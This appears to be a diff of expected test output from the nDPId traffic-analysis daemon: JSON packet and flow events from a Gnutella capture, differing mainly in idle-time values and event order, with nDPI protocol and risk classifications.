-00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1104,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":2,"flow_last_seen":91074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91074,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA84AAEAGXEIOyP\/lCgACD5DCxHYAwlYBrXv\/HGAS\/\/8kxQAAAgQFtA=="} -00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1105,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":3,"flow_last_seen":91074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91074,"pkt":"UlQAEjUCCAAn5uVZCABFAAAotiFAAIAGKfIKAAIPDsj\/5cR2kMKte\/8cAMJWAlAQ+vBBkQAA"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1106,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90740,"flow_last_seen":91075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91075,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50294,"dst_port":37058,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":2,"flow_last_seen":91076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91076,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA9AAAEAGXEAOyP\/lCgACD7KOxHkAw1ABv2bicWAS\/\/8TtQAAAgQFtA=="} -00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1110,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":3,"flow_last_seen":91076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91076,"pkt":"UlQAEjUCCAAn5uVZCABFAAAotiNAAIAGKfAKAAIPDsj\/5cR5so6\/ZuJxAMNQAlAQ+vAwgQAA"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1111,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":91076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91076,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50297,"dst_port":45710,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1185,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":91716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":91716,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QYNAAIAGx74KAAIPYteCnMRvMHWjnzXtAAAAAIAC+vC0KwAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1186,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":91717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":91717,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QNNAAIAG5KUKAAIPVHZ0xsRurkgo6JHMAAAAAIAC+vBxaAAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":92750,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":92750,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0nYJAAIAGGXYKAAIPSsPs+cRxSH3g2g3bAAAAAIAC+vA0rwAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1199,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":92750,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":92750,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AqVAAIAGaH0KAAIPTHc3HMRwT3sv+xA+AAAAAIAC+vCQWAAAAgQFtAEDAwgBAQQC"} 
-00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":3,"flow_last_seen":93622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KplAAIAGI1wKAAIP2qTGG8Rf6yo8NHW4AAAAAIAC+vBl2QAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":3,"flow_last_seen":93622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0y5RAAIAGmKYKAAIPchsYX8ReLKPFX+7aAAAAAIAC+vA4WgAAAgQFtAEDAwgBAQQC"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":2,"flow_last_seen":91051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91051,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8YAAEAGMiyVHKOvCgACD8MkxIcAvm4BvtmXiWAS\/\/8GbQAAAgQFtA=="} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":3,"flow_last_seen":91052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91052,"pkt":"UlQAEjUCCAAn5uVZCABFAAAozKZAAIAG6U4KAAIPlRyjr8SHwyS+2ZeJAL5uAlAQ+vAjOQAA"} 
+00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":2,"flow_last_seen":91057,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91057,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8cAAEAG2CXL3Mb0CgACDwSqxHsAv2gBodiVp2AS\/\/+P0AAAAgQFtA=="} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":3,"flow_last_seen":91057,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91057,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoTH9AAIAGD3EKAAIPy9zG9MR7BKqh2JWnAL9oAlAQ+vCsnAAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":2,"flow_last_seen":91058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91058,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8gAAEAG\/LTc7pFSCgACD4L3xIIAwGIBECov1GAS\/\/8zjQAAAgQFtA=="} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1093,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":91058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91058,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1094,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":3,"flow_last_seen":91058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91058,"pkt":"UlQAEjUCCAAn5uVZCABFAAAouGtAAIAGyBQKAAIP3O6RUsSCgvcQKi\/UAMBiAlAQ+vBQWQAA"} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":91058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91058,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1098,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90742,"flow_last_seen":91059,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91059,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":50299,"dst_port":1194,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":2,"flow_last_seen":91062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91062,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8wAAEAG\/T488TDCCgACD1M1xIUAwVwBVNBhD2AS\/\/\/z9wAAAgQFtA=="} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":3,"flow_last_seen":91062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91062,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxU5AAIAGu78KAAIPPPEwwsSFUzVU0GEPAMFcAlAQ+vAQxAAA"} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1102,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":91062,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":91062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1104,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":2,"flow_last_seen":91074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91074,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA84AAEAGXEIOyP\/lCgACD5DCxHYAwlYBrXv\/HGAS\/\/8kxQAAAgQFtA=="} +00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1105,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":3,"flow_last_seen":91074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91074,"pkt":"UlQAEjUCCAAn5uVZCABFAAAotiFAAIAGKfIKAAIPDsj\/5cR2kMKte\/8cAMJWAlAQ+vBBkQAA"} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1106,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90740,"flow_last_seen":91075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91075,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50294,"dst_port":37058,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":2,"flow_last_seen":91076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91076,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA9AAAEAGXEAOyP\/lCgACD7KOxHkAw1ABv2bicWAS\/\/8TtQAAAgQFtA=="} +00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1110,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":3,"flow_last_seen":91076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91076,"pkt":"UlQAEjUCCAAn5uVZCABFAAAotiNAAIAGKfAKAAIPDsj\/5cR5so6\/ZuJxAMNQAlAQ+vAwgQAA"} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1111,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":91076,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91076,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50297,"dst_port":45710,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1185,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":91716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":91716,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QYNAAIAGx74KAAIPYteCnMRvMHWjnzXtAAAAAIAC+vC0KwAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1186,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":91717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":91717,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QNNAAIAG5KUKAAIPVHZ0xsRurkgo6JHMAAAAAIAC+vBxaAAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":92750,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":92750,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0nYJAAIAGGXYKAAIPSsPs+cRxSH3g2g3bAAAAAIAC+vA0rwAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1199,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":92750,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":92750,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AqVAAIAGaH0KAAIPTHc3HMRwT3sv+xA+AAAAAIAC+vCQWAAAAgQFtAEDAwgBAQQC"} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":3,"flow_last_seen":93622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KplAAIAGI1wKAAIP2qTGG8Rf6yo8NHW4AAAAAIAC+vBl2QAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":3,"flow_last_seen":93622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0y5RAAIAGmKYKAAIPchsYX8ReLKPFX+7aAAAAAIAC+vA4WgAAAgQFtAEDAwgBAQQC"} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1206,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":93713,"flow_last_seen":93713,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":93713,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.168.175.31","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1206,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":93713,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93713,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Ab0AAIARJSYKAAIPWKivH3AJGMoAIAKXR05EED7+AQFUC1FLUlAGUk5BXS\/iNQlw"} 
00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1207,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":93714,"flow_last_seen":93714,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":93714,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.249.63.200","src_port":28681,"dst_port":22582,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1207,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":93714,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93714,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0J3cAAIARnXIKAAIPKfk\/yHAJWDYAIGEwR05EED7\/AQFUC1FLUlAGUk5BXS\/iNQlw"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":2,"flow_last_seen":93763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93763,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GYxAAIAGqNsKAAIPXwrNQ8R0LVPIsf8hAAAAAIAC+vCCJwAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":2,"flow_last_seen":93763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93763,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AsBAAIAGpi8KAAIP1eVv4MSREwzLMAmEAAAAAIAC+vB1+AAAAgQFtAEDAwgBAQQC"} 
-00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":2,"flow_last_seen":93763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93763,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Rs1AAIAGRA4KAAIPyAeb0sRzbs28TEPZAAAAAIAC+vDQzwAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1212,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":2,"flow_last_seen":93763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93763,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0MiVAAIAGHAgKAAIPXjZCUsSB+JU5M3UyAAAAAIAC+vBcCwAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":2,"flow_last_seen":93763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93763,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gg5AAIAGKkUKAAIPSVn5CMRyxdmnmnGXAAAAAIAC+vCCMAAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1214,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":2,"flow_last_seen":93763,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":93763,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0O4JAAIAGzRMKAAIPTG6ZscSGnFbyaQhuAAAAAIAC+vAmPAAAAgQFtAEDAwgBAQQC"} 
-00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1215,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":94638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":94638,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AtlAAIAGwDcKAAIPGLMS8sRhuOFovA6\/AAAAAIAC+vBHrQAAAgQFtAEDAwgBAQQC"} 